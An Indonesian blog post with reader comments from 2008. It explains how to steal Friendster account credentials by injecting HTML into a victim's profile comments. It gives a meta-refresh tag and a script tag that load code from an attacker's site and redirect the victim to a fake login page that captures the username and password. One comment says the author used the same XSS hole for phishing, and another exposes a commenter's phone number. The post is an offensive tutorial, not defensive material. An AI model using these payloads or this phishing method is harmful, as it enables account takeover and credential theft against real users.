Mendapatkan username dan password FS
Untuk mendapatkan password user friendster, susah-susah gampang, dibilang gampang karena kita hanya memasukkan sebuah script untuk melakukan redirect ke halaman fakelogin.
Kenapa harus fakelogin?
Karena dengan menggunakan fakelogin kita akan menjebak sipemilik friendster (korban) untuk melakukan login ulang.
Beberapa tehnik untuk melakukan redirecting kehalaman fakelogin
- Menggunakan meta content, untuk redirect keweb fake login seperti contoh dibawah ini
- Menggunakan tag script dengan mengarahkan script sourcenya keweb tempat halaman fakelogin, untuk langkah kedua ada beberapa langkah yang harus diperhatikan diantaranya :
<meta content='0;url=http://stmikbg.com/fs' http-equiv='Refresh' />
- Memasukkan tag script kecomment korban, script yang dimasukkan adalah
<pre><script src="http://yourwebfakelogin.com/redirect.js"></script></pre>
document.location = "http://yourwebfakelogin.com";
Langkah selanjutnya membuat halaman fakelogin yang mirip dengan halaman login friendster aslinya.
stmikbg.com adalah web untuk komunitas bagi anak-anak stmik bumigora khususnya dan anak-anak IT umumnya, baek yang cupu maupun yang expert.
August 24th, 2008 at 7:00 pm
PertamaX
August 30th, 2008 at 2:28 am
Bro td guw bru bljr hack fs, iseng2 w nemu script diatas. Truz uda w copy paste, tp sialnya w c0ba ksh testi di fs gw sndri. Truus penyembuhanya gmana?tolongn dunk, plis! Sms 085729370397
August 31st, 2008 at 11:45 am
KeduaX
October 7th, 2008 at 1:13 pm
wakaka.. Dudul ;D ;D
December 2nd, 2008 at 9:55 pm
[...] saya tentang lubang keamanan difriendster tentang xss vurnerable. Kayaknya lubang keamanan ini sudah pernah saya posting sebelumnya dan saya gunakan untuk melakukan phising. Tapi lubang keamanan kali ini menggunakan cookie [...]